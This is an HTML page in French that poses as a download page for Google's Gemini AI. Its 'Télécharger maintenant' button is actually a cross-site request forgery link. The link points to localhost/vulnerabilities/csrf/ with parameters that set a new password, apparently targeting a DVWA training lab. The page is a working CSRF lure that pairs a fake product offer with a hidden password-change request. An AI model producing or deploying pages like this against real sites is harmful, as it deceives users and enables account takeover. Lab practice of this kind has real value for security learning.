<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Télécharger l'IA Gemini de Google</title>
    <style>
        body {
            font-family: 'Roboto', sans-serif;
            background-color: #121212;
            color: #fff;
            text-align: center;
            margin: 0;
            display: flex;
            align-items: center;
            justify-content: center;
            height: 100vh;
        }

        h1 {
            font-size: 2em;
            color: #03a9f4;
        }

        p {
            font-size: 1.2em;
            margin-top: 10px;
        }

        a {
            display: inline-block;
            padding: 15px 30px;
            background-color: #03a9f4;
            color: #fff;
            text-decoration: none;
            border-radius: 8px;
            transition: background-color 0.3s ease;
            font-size: 1.2em;
            margin-top: 20px;
            border: 2px solid #03a9f4;
            cursor: pointer;
        }

        a:hover {
            background-color: #0288d1;
            border-color: #0288d1;
        }
    </style>
</head>
<body>
<div>
    <h1>Télécharger l'IA Gemini de Google</h1>

    <p>Cliquez sur le lien ci-dessous pour télécharger l'IA Gemini de Google :</p>

    <a href="http://localhost/vulnerabilities/csrf/?password_new=thomas&password_conf=thomas&Change=Change#">Télécharger maintenant</a>
</div>
</body>
</html>
